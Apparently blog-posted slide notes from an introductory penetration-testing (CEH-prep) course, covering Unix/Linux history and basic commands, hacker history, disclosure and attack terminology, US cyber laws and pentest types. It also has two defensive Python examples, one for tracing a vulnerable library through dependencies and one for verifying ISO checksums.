  • In 1984, AT&T agreed to break up the old telephone monopoly in exchange for being allowed to finally sell computers.  It thought it could turn the popularity of UNIX into a cash cow…but failed miserably in the end.  As several other companies (such as HP, IBM, and Sun) had already developed commercial UNIX distributions, AT&T kicked off what is called the “UNIX Wars,” trying to retake the market from all these competitors with their new Unix System V (as in the Roman numeral for “5”).  All that ended up happening was that the market became a mess of look-alike, but incompatible, products trying to push different, competing standards.
  • In 1991, a Finnish computer science student first shared his custom-built OS kernel on Usenet.  This would finally solve the problem of the missing GNU kernel and create a free and usable operating system that anyone could download, install, and even customize.  The other big innovation was that Linux was designed to run on IBM PC-compatible computers and could do the sort of advanced tasks that would normally require a very expensive UNIX workstation.

Screen Shot 2016-01-18 at 8.01.52 PM.png

  • Portable: can be easily rewritten for different processors and platforms, such as Intel x86, ARM, PowerPC, SPARC, etc.
  • Multi-tasking: it can run several different programs or tasks at the same time
  • Multi-user in a time-sharing configuration: it can support multiple users at the same time, who all share the system’s resources (CPU, RAM, disk space, etc.)

Screen Shot 2016-01-18 at 8.01.53 PM.png

  • Really, everything is represented by a file.  Including devices like the hard drive and CD-ROM, processes in memory, and even TCP/UDP ports
  • Linux cares whether the letters in file names and commands are upper-case or lower-case

Screen Shot 2016-01-18 at 8.01.55 PM.png

  • The big surviving commercial Unix distributions you’ll see in corporate environments are IBM AIX, Oracle Solaris (developed by Sun Microsystems before Oracle bought them), and Hewlett-Packard HP-UX.  Many of the older proprietary Unices have been replaced by free and open-source lookalikes like Linux and FreeBSD.
  • SCO had two Unices: OpenServer (which, believe it or not, started life as Xenix, Microsoft’s own Unix distro) and UnixWare, which it bought from Novell.  SCO itself is dead and these two distros are now sold by a company called Xinuos.
  • The weird little icon in the bottom left is the logo of Silicon Graphics Inc. (SGI) IRIX, a Unix distro used on SGI Iris workstations and popular in the early 3D graphics world.  It’s been dead for some years now.
  • Tru64 was the last Unix distribution produced at DEC, for the Alpha platform.  Some Alphas still get legacy support from HP (which ended up owning all of DEC’s intellectual property).  Otherwise, Tru64 is dead.

Screen Shot 2016-01-18 at 8.01.59 PM.png

  • The different BSD operating systems have always been free and open source.  Actually, if BSD hadn’t been mired in stupid lawsuits from AT&T in the late 80’s and 90’s, we’d probably be using it exclusively and Linux would’ve never happened.
  • The three big BSD distributions are FreeBSD, NetBSD, and OpenBSD.  FreeBSD and NetBSD were some of the first projects to spin off the original UC Berkeley work.  OpenBSD is itself a fork of NetBSD, with a strong focus on making the OS as secure as possible.  There are numerous other forks off of FreeBSD, including Dragonfly BSD, GhostBSD, PC-BSD (with a focus on being very user-friendly, especially to people migrating from Windows), and many others.

Screen Shot 2016-01-18 at 8.02.03 PM.png

  • Really, the biggest BSD-derived operating system is actually Mac OS X.
  • When Steve Jobs was forced out of Apple in the mid-80’s, he founded a company called NeXT.  NeXT produced high-end workstations with an easy-to-use graphical interface, running an OS derived from BSD Unix called NeXTSTEP.  Later, Apple would purchase NeXT, turn NeXTSTEP into Mac OS X, and Jobs would make his triumphant return to the CEO chair of Apple.

Screen Shot 2016-01-18 at 8.02.04 PM.png

  • From the beginning, people were free to take the Linux kernel, the GNU tools, and any other software they wanted and throw together a “distribution.”  There was never really any “official” Linux distribution, just whatever the community put together.
  • One of the big families is that of Red Hat, one of the biggest commercial Linux vendors.  Their flagship product is Red Hat Enterprise Linux (RHEL).  Fedora is their desktop-oriented release that is maintained by a community of Red Hat employees and volunteer developers.  CentOS is a clone of RHEL for people who want the advantages of a server Linux OS but don’t want to purchase a Red Hat support contract.

Screen Shot 2016-01-18 at 8.02.05 PM.png

  • Another big and important family of distributions is the Debian family.
  • Members of the family include Ubuntu and Linux Mint, which both aim to be user-friendly and easy for Windows users to switch to.
  • Kali Linux is also derived from Debian.  Its predecessor, BackTrack Linux, was a fork of Ubuntu.
  • Knoppix isn’t as popular as it used to be, but was a pioneer in the concept of the “LiveCD” and “LiveUSB”: an operating system that could run from a CD-ROM or USB stick without having to install it onto a hard drive.
  • Tails (The Amnesic Incognito Live System) is a privacy and security-focused distro, popularly used by NSA leaker Edward Snowden, that forces all traffic to go over the Tor anonymizer network.

Screen Shot 2016-01-18 at 8.02.07 PM.png

  • Some other popular Linux distros include:
  • SuSE Linux, another commercial Linux distribution that’s sold by Novell.
  • Arch and Gentoo are famous for their customizability and orientation towards power users
  • Puppy Linux is geared towards older or resource-constrained systems
  • Slackware is one of the oldest Linux distributions
  • Don’t forget that Google Android itself is a derivative of Linux, though heavily modified.

Screen Shot 2016-01-18 at 8.02.08 PM.png

Screen Shot 2016-01-18 at 8.02.09 PM.png

Screen Shot 2016-01-18 at 8.02.10 PM.png

  • Sorry, you’re on your own here. You can easily download the ISO file for Linux Mint or another Linux distro and try installing it in VMware or VirtualBox.  It’s not that hard, I promise! 😉

Screen Shot 2016-01-18 at 8.02.12 PM.png

  • Tab completion – if you type part of a command or file name and hit the “Tab” key on your keyboard, Unix/Linux will try to guess what you mean.  If there’s more than one possibility, hit “Tab” twice
  • Arrow keys – pressing the up or down arrow keys on your keyboard will move through the history of commands you’ve entered.  Also, some programs (such as vim) may use the H, J, K, L keys instead of the arrow keys.  This is a throwback to older keyboards from the 70’s.
  • Quotes and escape characters – if you have to enter a file name that has spaces, asterisks, or other special characters (that Linux would normally use when interpreting commands), you can either wrap the name in single-quotes or double-quotes, or use the backslash ( \ ) to “escape” those characters and tell Linux to ignore them.  Examples:   ls -al "Hello World *.txt"; ls -al 'Hello World *.txt'; ls -al Hello\ World\ \*.txt
  • Scripting – just like batch or Powershell scripting in Windows, Linux shells have robust scripting languages that act like mini-programming languages.  These files might have a .sh file extension and, if you open them in a text editor, they will start with a hash symbol, an exclamation point, and the filepath of the shell they use, such as #!/bin/bash or #!/bin/sh
  • Package managers (apt, yum, pacman, ports, etc.) – package managers are built into almost every Linux distro and allow you to easily pull down new software from the internet and install it.  Debian uses the apt package management system and .deb installer files.
  • passwd – this is the command to change your or (if you’re an admin) another user’s password
  • su and sudo – su stands for “switch user” and sudo for “switch user and do this”; these utilities allow you to login as or perform an action as another user, usually the root user. Most Linux systems, for accountability and security, don’t let admins login as root, so they use a combination of su and sudo instead to perform root-level actions, like installing new software, changing system files, creating/deleting users, etc.
  • ln – this is the command to make a link, like making a shortcut in Windows
  • nano, vi/vim, and emacs – these are some of the most common text editors you’ll see on Linux/Unix systems.  Nano is the easiest to use, vi/vim are de facto standards and you’ll find them on any Unix system, and emacs is a very programmer-centric text editor
  • touch – this command will update the time stamp on a file or directory and is also a quick way to make a new blank file
  • top – this is a command-line system monitor program, much like Task Manager in Windows, where you can see and sort running processes by RAM usage, CPU utilization, PID, and other values
  • exit – this is a way of exiting or logging out of your session; you can use it to kill an ssh session, or if you logged in as root using “su”, it would end root’s session and drop you back to your normal user session

Screen Shot 2016-01-18 at 8.02.13 PM.png

Screen Shot 2016-01-18 at 8.02.15 PM.png

CNS320 Lesson 1 – Introduction

Lesson 1 – Introduction

Screen Shot 2016-01-18 at 1.05.09 PM.png

  • “Responsible disclosure” means that, if you find an organization’s server is misconfigured, or their software has a bug that can be exploited, etc., you tell the company about it first and give them time to remediate before you disclose anything publicly
  • May also hear it called “coordinated disclosure”
  • “Full disclosure” is telling anyone and everyone about a vulnerability as early as possible, not necessarily giving the target org any lead time
  • Many security professionals report vulnerabilities and give the company a deadline to fix it before the details will be published to a mailing list, blog, etc.

Screen Shot 2016-01-18 at 1.05.11 PM.png

  • Vulnerability – a weakness in the system design, implementation, software or code, or the lack of a mechanism
  • Threat – any agent, condition, or circumstance that could potentially cause harm, loss, damage, or compromise to an IT or data asset
  • Exploit – a piece of software, tool, or technique that takes advantage of a vulnerability; could lead to access, privilege escalation, denial of service, etc.
  • Exposure – when a vulnerability is reachable by a threat, who could then exploit it

Screen Shot 2016-01-18 at 1.05.12 PM.png

  • Phone phreaks, much like computer hackers, were part curious explorer and part petty criminal.  They were extremely interested in how the Bell telephone system worked and poked and prodded their way through…usually with the goal of successfully committing “toll fraud” or getting free long distance calls.  Before the final divestiture of the Bell System in 1984, long distance was extremely expensive.  For example, a Bell commercial from 1970 touts the new minimum rate of 70 cents for a three minute call, which adjusted for inflation would be $4.27 today.  And that was the (cheaper) weekend rate.  Phone phreaks figured out ways to game the phone system to give themselves free long distance calls and later free features like conference calling and call waiting.  As the telephone system has become harder to cheat, and phone calls get cheaper and cheaper, phone phreaking has almost disappeared.
  • Worth a read is the brief “Conscience of a Hacker” (AKA the Hacker Manifesto) by the Mentor:

Screen Shot 2016-01-18 at 1.05.13 PM.png

  • I could go back even further to Samuel Morse and the invention of the electric telegraph in 1837, but the telephone was a much more democratized invention.  Telegraphs were in special offices, controlled by specialist operators; telephones were in your house and you could use them whenever you wanted.  You could draw a parallel between mainframes and home PCs, maybe.
  • ARPANET was named for DARPA, the Defense Advanced Research Projects Agency, which funds new inventions for the US military.  Kind of like Q Branch from the James Bond novels and movies 😉
  • The telephone network laid the global infrastructure that would allow ARPANet (and other research networks) to evolve into the Internet and interconnect computer systems across the planet.
  • ARPANET is also important for setting TCP/IP as the standard protocol stack for the future Internet.

Screen Shot 2016-01-18 at 1.05.15 PM.png

  • John Draper discovered that a toy whistle (that came as the free prize in a box of Cap’n Crunch cereal) produced the right 2600 hertz tone needed to open new trunk lines.  He used it as inspiration to build a tone-generating device for making free phone calls.  Steve Jobs and Steve Wozniak famously made and sold blue boxes before going on to found Apple.  Before blue boxes, some people had actually figured out how to whistle the right tones to fool the phone system.
  • BBS’s were like early forums, where members could post messages, send and receive email, share files, play games, etc.  This was before the Internet was available in people’s homes.  To reach a BBS, you had to dial its telephone number via your computer’s modem.  If the computer hosting the BBS only had one phone line connected to it, only one person could dial in and use it at a time.  If you dialed up a BBS in another city, you’d be paying long-distance rates by the minute to use it.  Much like today, BBS’s could also be havens for illegal file sharing, cracking copy-protected software, distributing porn, and other shady activities.
  • This actually created a natural progression from BBS user to phreaker to hacker.  Take for instance a kid who gets a modem and discovers a few BBS’s in his local area.  These lead him to the numbers of other BBS’s in other cities.  He calls them up, makes friends, plays cool games, shares files, and has a good time…until his parents’ phone bill comes!  After his parents get done grounding him, he probably sulks on the local boards, complaining about how he misses the new friends he made on those other boards and how stupid long-distance phone rates are.  A phreaker on the BBS tell him how to build a bluebox, or shares some stolen phone card #’s with him, so he can get back on those far-away BBS’s without any pesky long distance charges.  Our kid has just transitioned into a phone phreaker.  The next step is learning about you can sneak into corporate computers and look at all the cool stuff they have…maybe break into a game company’s computer and get a free copy of the hottest DOS game…or break into your school’s computer and change your grades!  Our teenager has finally made the leap to hacker.
  • Usenet is like a hybrid between email and Internet forums, but decentralized and spread out over many servers.  Like BBS’s, it was a popular way for computer hobbyists, hackers, and others to connect, but since Usenet mostly ran on big iron at research labs, universities, and corporations, its user base wasn’t as big.  Crusty old Usenet denizens used to dread the month of September, when they’d have to deal with all the n00b university students who had just gotten their computer accounts and started stumbling into Usenet like idiots.  Once Usenet became available to home Internet users in the 90’s, the crusty old Usenetters called it “eternal September” because of the constant stream of newbies.  Usenet is still around; Google Groups gateways and archives it.  Paid Usenet accounts are also popular for getting access to binary newsgroups where you can pirate software, movies, TV shows, etc.  Probably won’t be long before the authorities start cracking down on it, like Napster and torrents before it.

Screen Shot 2016-01-18 at 1.05.16 PM.png

Screen Shot 2016-01-18 at 1.05.17 PM.png

  • US-CERT: US Computer Emergency Response Team
  • Some consider the 80’s the golden age of hacking.  Many of the first hackers got their start in this era, whether through BBS’s, online services like CompuServe, or their university’s Unix systems and ARPANET connection.
  • A great book on this era, which I highly recommend, is Bruce Sterling’s The Hacker Crackdown, which you can buy on Amazon or read for free online:

Screen Shot 2016-01-18 at 1.05.18 PM.png

  • EFF: Electronic Frontier Foundation
  • ISP: Internet Service Provider
  • DEC: Digital Equipment Corporation, makers of the influential PDP-11 and VAX computer lines that Unix grew up on.  Sadly no more, was bought out by Compaq in the late 1990’s, which was in turn bought by HP in 2002.

Screen Shot 2016-01-18 at 1.05.19 PM.png

  • Mitnick’s escapes are well-documented.  “Takedown,” by John Markoff and Tsutomu Shimomura, was written by some of the people involved in catching him the second time.  Mitnick has written several books of his own, including “The Art of Intrusion” and “Ghost in the Wires,” his account of his years on the run from the law.
  • DDoS: Distributed Denial-of-Service
  • Mitnick spent part of his imprisonment in solitary confinement after some of his underground enemies convinced authorities that he could start a nuclear war just by whistling into a pay phone.

Screen Shot 2016-01-18 at 1.05.20 PM.png

Screen Shot 2016-01-18 at 1.05.22 PM.png

Screen Shot 2016-01-18 at 1.05.23 PM.png

Screen Shot 2016-01-18 at 1.05.24 PM.png

  • The biggest breach of 2013 was definitely the NSA 😉

Screen Shot 2016-01-18 at 1.05.26 PM.pngScreen Shot 2016-01-18 at 1.05.28 PM.pngScreen Shot 2016-01-18 at 1.05.29 PM.png

  • Script kiddie (or skiddie, for short) is a derogatory term for a cybercriminal who doesn’t know what the f**k he’s doing.  The stereotype is a minor who only knows how to download and clicky-clicky on attack tools he finds on  In reality, the majority of “cybercriminals” fit in this category.  Most are just petty criminals in Russia or other non-extradition countries who run exploit kits they bought on the darknet and steal bank account credentials and credit card numbers.
  • APT, or advanced persistent threat, is shorthand for nation-state-sponsored hackers (Chinese PLA; Russian FSB, MVD, or GRU; American NSA and CYBERCOM; British GCHQ).  Lots of money, lots of talent, and lots of time to hack whoever and whatever they want.
  • The whole “cracker” business comes from old-school hackers who feel that the term “hacker” has been misappropriated by the media and taken on a purely negative connotation.  They feel that “hacker” should still be used in the old sense, as in a skilled programmer or technical genius, not a fat Russian cybercriminal who’s stealing credit card numbers by phishing your grandma on Facebook.
  • It’s mostly a losing battle.

Screen Shot 2016-01-18 at 1.05.30 PM.png

  • Hacktivists: a sub-class of gray hat; they may violate the law by breaking into a company without permission, but they were motivated to do it to uncover evidence that a company has been bribing politicians or dumping toxic waste in rivers, for example.
  • “Suicide hacker” is a stupid term you might see on the test.  Basically a hacker that doesn’t care if they get caught or if they hurt people.  I’ve never heard it used outside of EC-Council material.

Screen Shot 2016-01-18 at 1.05.31 PM.png

  • Money is an obvious motive (CC #’s, identity theft material like SSNs or other personal info, bank credentials, etc.)
  • Spies and cyberwarfare operatives are especially attracted to stealing sensitive info, like classified data, trade secrets, government communications, etc.
  • Some hackers are motivated by ideology, like Wikileaks contributors, some Anonymous or patriotic hackers like th3j3st3r
  • Some hackers pop boxes for street cred and respect within the underground
  • And some hackers are just a**holes who want to troll, damage sites, or commit the digital equivalent of vandalism, like many other Anons or Lizard Squad

Screen Shot 2016-01-18 at 1.05.33 PM.png

  • CFAA (1986) is the grand-daddy of US hacking laws; it has been expanded several times since it first passed, including by the USA PATRIOT Act in 2001
  • ECPA (1986) extended the laws that protect phone conversations to electronic communications in transit, such as email and web traffic, and added the Stored Communications Act to cover stored data
  • CALEA (1994) requires telecommunications carriers to build lawful-intercept capability into their networks so court-ordered wiretaps can be executed; the FCC later extended it to broadband Internet access and VoIP providers
  • DMCA (1998) imposes penalties for circumventing DRM (digital rights management) and for making or distributing tools for that purpose; security researchers have to rely on narrow exemptions
  • CSEA, the Cyber Security Enhancement Act of 2002, was passed as part of the Homeland Security Act; it raised sentences for computer crimes and loosened the PATRIOT Act’s emergency-disclosure rules so that ISPs can hand subscriber information to the government more easily in the name of homeland security

Screen Shot 2016-01-18 at 1.05.34 PM.png

  • I always be hackin’ in a tie and ski mask!
  • In fact, if you want to find out who’s attacking your company, just hack back the IP that was attacking you and look at them through the web cam.  If they’re wearing a dark hoodie, balaclava, or burglar mask, then you know you have the right guy!  #protip

Screen Shot 2016-01-18 at 1.05.35 PM.png

  • Shrink-Wrap Code: off-the-shelf code that gets reused across lots of different software.  Prime examples would be the OpenSSL libraries or the Cocoa Touch framework that all iOS apps build upon.  A weakness in a common library or framework like that expands the attack surface considerably, because every product that embeds it inherits the bug: Heartbleed in OpenSSL (2014) was a single missing bounds check, but it exposed every server and device that linked the affected versions.
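To make the blast-radius point concrete, here is an added example (mine, not from the course slides and not tied to any real advisory): a small script that takes a constructed, SBOM-style inventory of applications and the library versions they ship, plus an advisory’s affected-version range, and reports every application that is exposed, including the ones that never list the library directly and only inherit it through another component.  The component names, the versions, and the library `libtls` are all made up; the range mirrors the shape of a real library advisory but refers to nothing real.

```python
"""Added example (not from the course slides and not tied to any real
advisory): measure the blast radius of a flaw in shared "shrink-wrap" code.

INVENTORY is a constructed, SBOM-style map of each component to the
libraries and components it ships with, and the advisory range used below
is made up for the fictional library "libtls".  The script reports every
component that is exposed, including ones that never list the library
directly and only inherit it through another component.
"""
import re

# Constructed inventory: component -> {dependency name: version}
INVENTORY = {
    "webshop":      {"libtls": "1.0.1f", "libjson": "2.4"},
    "mailgw":       {"libtls": "1.0.1g"},          # already on the fixed release
    "mobile-app":   {"ui-framework": "7.1"},       # never mentions libtls at all
    "ui-framework": {"libtls": "1.0.1e"},
    "billing":      {"libjson": "2.4"},
}


def parse_version(version: str) -> tuple:
    """Turn '1.0.1f' into ((0, 1), (0, 0), (0, 1), (1, 'f')).

    Numeric parts are tagged 0 and letter suffixes tagged 1 so the tuples
    stay comparable and a bare '1.0.1' orders before '1.0.1a'.  This is a
    toy ordering; real ecosystems (PEP 440, semver, dpkg) have their own.
    """
    return tuple(
        (0, int(tok)) if tok.isdigit() else (1, tok.lower())
        for tok in re.findall(r"\d+|[A-Za-z]+", version)
    )


def is_affected(version: str, first_bad: str, first_fixed: str) -> bool:
    """True if first_bad <= version < first_fixed under parse_version ordering."""
    v = parse_version(version)
    return parse_version(first_bad) <= v < parse_version(first_fixed)


def exposed_components(inventory: dict, library: str,
                       first_bad: str, first_fixed: str) -> dict:
    """Return {component: chain} for every exposed component.

    chain is the path from the component down to the vulnerable library,
    e.g. ['mobile-app', 'ui-framework', 'libtls 1.0.1e'].
    """
    exposed = {}
    # Pass 1: components that ship an affected version of the library directly.
    for comp, deps in inventory.items():
        if library in deps and is_affected(deps[library], first_bad, first_fixed):
            exposed[comp] = [comp, f"{library} {deps[library]}"]
    # Pass 2+: propagate upward until no new component becomes exposed.
    changed = True
    while changed:
        changed = False
        for comp, deps in inventory.items():
            if comp in exposed:
                continue
            for dep in deps:
                if dep in exposed:
                    exposed[comp] = [comp] + exposed[dep]
                    changed = True
                    break
    return exposed


if __name__ == "__main__":
    # Constructed advisory: libtls 1.0.1 up to (not including) 1.0.1g is affected.
    hits = exposed_components(INVENTORY, "libtls", "1.0.1", "1.0.1g")
    for comp, chain in sorted(hits.items()):
        print(f"{comp:13s} exposed via {' -> '.join(chain)}")
```

Run it and the mobile app shows up as exposed even though it never lists libtls itself, which is exactly why a flaw in shared code is worse than a flaw in one product.  The version comparison is a simple numeric-then-letter split; in production use the comparator of the package ecosystem you are actually inventorying.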

Screen Shot 2016-01-18 at 1.05.37 PM.png

  • These are the phases of an attack by a cybercriminal, APT, hacktivist, or other malicious actor

Screen Shot 2016-01-18 at 1.05.38 PM.png

Screen Shot 2016-01-18 at 1.05.39 PM.png

Screen Shot 2016-01-18 at 1.05.40 PM.png

Screen Shot 2016-01-18 at 1.05.41 PM.png

Screen Shot 2016-01-18 at 1.05.43 PM.png

Screen Shot 2016-01-18 at 1.05.44 PM.png

  • Audits are overwhelmingly concerned with making sure the right policies and procedures are in place and that they are being followed
  • Vulnerability assessments go as far as finding the weaknesses, but not actively attempting to exploit them
  • A penetration test goes all the way, finds the vulnerabilities AND exploits them to demonstrate what an attacker could do

Screen Shot 2016-01-18 at 1.05.45 PM.png

Screen Shot 2016-01-18 at 1.05.46 PM.png

  • White box: Full Knowledge.  You have complete information on the network, ranges, systems, infrastructure, etc.  Usually used to simulate an insider attack.
  • Black box: No Knowledge.  You might not know anything except the name of the company and have to discover/reconnoiter everything yourself.  Usually used to simulate an outside attack.
  • Gray box: Partial Knowledge.  Somewhere in the middle; client gives you some information, but not everything.  This is the most common sort of pentest.

Screen Shot 2016-01-18 at 1.05.48 PM.png

Screen Shot 2016-01-18 at 1.05.49 PM.png

Screen Shot 2016-01-18 at 1.05.50 PM.png

Screen Shot 2016-01-18 at 1.05.52 PM.png

Screen Shot 2016-01-18 at 1.05.53 PM.png

Screen Shot 2016-01-18 at 1.05.54 PM.png

  • E&O = Errors & Omissions

Screen Shot 2016-01-18 at 1.05.55 PM.png

Screen Shot 2016-01-18 at 1.05.56 PM.png

Screen Shot 2016-01-18 at 1.05.57 PM.png

  • This will all be discussed in more depth in future lessons.

Screen Shot 2016-01-18 at 1.05.59 PM.png

  • Threat modeling is a little outside the scope of this class.  The overall point is to focus your attacks or defense based on what sort of people and/or organizations threaten you.  Obviously, if you’re trying to defend against APT, your threat model is going to be extremely different from someone whose only threat is script kiddies defacing their website.

Screen Shot 2016-01-18 at 1.06.01 PM.png

Screen Shot 2016-01-18 at 1.06.02 PM.png

Screen Shot 2016-01-18 at 1.06.00 PM.png

Screen Shot 2016-01-18 at 1.06.04 PM.png

Screen Shot 2016-01-18 at 1.06.06 PM.png

  • The best way to experiment with Kali Linux is to download the official VM image or the ISO and run it inside virtualization software.  On Windows or Linux, VMware Player and VirtualBox are both free and work great; on a Mac, VirtualBox is the only free option.  Verify the download against the SHA256SUMS file (and its GPG signature) that Kali publishes alongside the images before you boot it.  There are numerous tutorials on installing it on the Kali Linux website.
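Before booting an image, check that what you downloaded is what Kali published.  The following is an added example, not something from the course or from Kali’s own tooling: it parses a SHA256SUMS file in the layout GNU `sha256sum` writes (digest, two spaces, file name, with an optional `*` binary marker), hashes the image in chunks so a multi-gigabyte ISO never has to fit in memory, and reports `ok`, `mismatch` or `unlisted`.  The file names and digests in the built-in `demo()` are constructed, not real Kali releases.

```python
"""Added example (not from the course and not Kali's own tooling): verify a
downloaded image against the SHA256SUMS file published next to it.

SHA256SUMS lines look like "<hex digest>  <file name>" (optionally
"<hex digest> *<file name>" for binary mode), the same layout GNU
`sha256sum` emits and `sha256sum -c` reads.  Every file name and digest
used in demo() is constructed for illustration.
"""
import hashlib
import tempfile
from pathlib import Path


def parse_sha256sums(text: str) -> dict:
    """Map file name -> expected lowercase hex digest.

    Accepts the optional '*' binary-mode marker in front of the name and
    skips blank lines and '#' comments.  Raises on a malformed entry rather
    than silently verifying nothing.
    """
    expected = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        name = name.strip().lstrip("*")
        if len(digest) != 64 or not name:
            raise ValueError(f"malformed SHA256SUMS line: {line!r}")
        expected[name] = digest.lower()
    return expected


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Stream the file through SHA-256; installer images are gigabytes."""
    h = hashlib.sha256()
    with Path(path).open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_image(sums_path: Path, image_path: Path) -> str:
    """Return 'ok', 'mismatch' or 'unlisted' for image_path."""
    image_path = Path(image_path)
    expected = parse_sha256sums(Path(sums_path).read_text())
    want = expected.get(image_path.name)
    if want is None:
        return "unlisted"          # wrong file, renamed file, or a sums file for another release
    return "ok" if sha256_file(image_path) == want else "mismatch"


def demo() -> tuple:
    """Constructed walk-through in a temp dir: a fake image and its sums file,
    then the same name with swapped bytes, then a file the sums never list.
    Returns the three verdicts in that order."""
    d = Path(tempfile.mkdtemp())
    image = d / "kali-linux-example-amd64.iso"          # constructed name, not a real release
    image.write_bytes(b"pretend this is a 4 GB installer image\n")
    sums = d / "SHA256SUMS"
    sums.write_text(
        f"{sha256_file(image)}  {image.name}\n"
        f"{'0' * 64} *kali-linux-example-netinst-amd64.iso\n"   # constructed second entry
    )
    first = verify_image(sums, image)
    image.write_bytes(b"same name, different bytes\n")          # simulate a swapped download
    second = verify_image(sums, image)
    third = verify_image(sums, d / "not-in-the-list.iso")
    return first, second, third


if __name__ == "__main__":
    print(demo())
```

A matching checksum only proves the file is the one the SHA256SUMS file describes, and both usually arrive over the same channel, so also verify the sums file’s detached signature (`gpg --verify SHA256SUMS.gpg SHA256SUMS`) after importing Kali’s archive signing key from the Kali site; otherwise an attacker who can swap the ISO can swap the sums file too.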

CNS320 – Intro to Penetration Testing

In 2015, I had the good fortune to come upon a part-time gig teaching a course at a local community college in the Louisville, KY area.  The course’s goal was to prepare students to sit for the EC-Council Certified Ethical Hacker (CEH) exam.  Say what you will about CEH, and EC-Council for that matter, but CEH is a decent introduction to the concepts behind penetration testing.  Plus, more and more job listings are asking for it, so it’s one of those all-important HR filter bypasses you can purchase for $500…much like the CISSP.  It won’t make you into a penetration tester, but it at least demonstrates that you understand the concepts and can navigate a Linux command-line and use nmap without looking like a moron.

I was able to land in infosec right out of college, joining a consulting firm in Chicago.  I’ve done policy work, security architecture, vulnerability remediation, and other tasks, but I always wanted to break into penetration testing.  My job at the time allowed me a few opportunities to get in on pentests, but it was far from my primary responsibility.  Unfortunately, the Louisville area didn’t have many pentesting opportunities, and breaking into such an area of expertise is hard.  I’d gotten the CEH back in 2010, with my eye on using it as a foot in the door, and had alerts set up on several job sites to inform me of any jobs with keywords like “penetration testing,” “CEH,” or “hacking” in them.  That was how the adjunct instructor gig came to my attention.

I say I was fortunate to find it for several reasons.  One, I’ve always loved teaching and presenting, and sharing knowledge with some really great students is its own reward.  Two, it helped reinforce my own knowledge of the field and actually helped me to blow ’em away in the interviews when a penetration testing job opportunity finally did come along.  Really, there is no better way to learn a subject, inside and out, than to teach it to others.  It forces you to build a deep, comprehensive knowledge of that subject so that you’re prepared to answer any question from your students and clear up any confusion they may have.  For example, my own understanding of buffer and heap overflows was pretty shallow until I was forced to explain it to students with almost no background in C programming.

I taught two semesters of this course before landing my current job, which forced me to relocate to Raleigh, NC.  Since those PPTX files are just gathering dust, I figured I’d post them here publicly and see if anyone else gets some good out of them.

The original course ran at night, twice a week for 11 weeks, and each class was about four hours long.  I’ll post the slide pics and notes.  Obviously, I can’t simulate all of the original lab conditions here, but where applicable I’ll point you to online tutorials that show how to do it on your own, using VMs or whatever.

The original course was supposed to be based on EC-Council’s official training material (Ethical Hacking & Countermeasures).  EC-Council normally requires you to attend their sanctioned training or boot camps before they let you sit for their exam; otherwise you can apply for a self-study waiver if you have a year or more of experience in information security.  Teaching from their books was what allowed my students to sit for the exam.

EC-Council’s official training material is mostly garbage, and I don’t say that lightly.  It is very poorly edited, typos and formatting errors abound, at times it’s an incoherent mess that constantly jumps between topics, and I never saw a screenshot of a system newer than Windows XP.  I used the books as a vague outline of what topics I should cover, then wrote all the presentations myself using different resources to fill in the needed information.  Overall, I tried to make the training look more like the OSCP, with a big focus on hands-on labs and CTFs, and with a big dose of irreverent humor injected into them.  These were four-hour classes, after all, so I had to keep the students’ attention!

At the front of each lesson, I’ll include a link to download the original PPTX file.  I actually use the Notes section beneath each slide, so make sure you’re reading it in order to get all the info.  Maybe someday I’ll come back and film YouTube videos of these in proper lecture format.

I hope you enjoy them and that you or your friends can use them to better understand the world of penetration testing.  If you have any questions or comments, please hit me up on Twitter (either by tweet or DM) at @ch1kpee.